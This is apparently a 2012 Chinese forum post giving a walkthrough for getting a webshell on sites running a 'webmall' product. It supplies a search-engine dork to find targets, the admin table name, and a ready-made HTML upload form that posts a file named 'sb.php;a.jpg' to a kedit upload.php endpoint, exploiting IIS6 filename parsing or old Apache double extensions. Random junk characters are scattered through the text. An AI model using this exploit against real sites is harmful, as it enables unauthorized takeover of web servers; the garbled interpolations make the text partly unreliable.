关键字:inurl:webmall/detail.php?id0 l) n. _+ A, B
. F' E5 i, @; h& E1 B: Q% ~* x& G, U
数据表:pwn_base_admin
' I6 w0 @5 P- T& u
' `/ B& Y; m7 D0 y: u- d* i2 ^关于拿shell$ w( Y/ B/ w9 C( Q
2 E1 g& M1 `+ r4 f
首先登录后台admin.php
* L- e6 v4 B8 e6 K/ k$ L
% v* _; w0 l2 E* [ n$ `看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。8 b5 b# @6 j/ ]; {$ E }; ]
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg3 F5 B% D# e4 @ B9 C$ F! k1 z) L
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的- q7 u) Q1 m/ ^. I! P+ h$ [
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> 7 d/ u- N7 Q4 M) k7 T! z Q
<input type="text" name="fileName" value="sb.php;a.jpg" />
5 @# \% f* ]6 z<input type="hidden" name="attachPath" value="news/pics/" /> " h) j1 I: m9 f
<input type="file" name="fileData" size="14" /></td>
9 c6 h( F" @/ A0 L1 [$ y<input type="submit" name="button" value="确定" />
3 c( R7 m% n# l5 O9 B: k1 f; U* B0 J</form>! T+ D% E% z9 R3 R
1 ^8 @& s# G: d5 t首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
/ P4 ?5 F- m( A$ a7 M4 A+ r4 b+ y4 o6 {* M4 a# J. C! r7 f
|
发表于 2012-11-9 20:52:15
收藏
支持
反对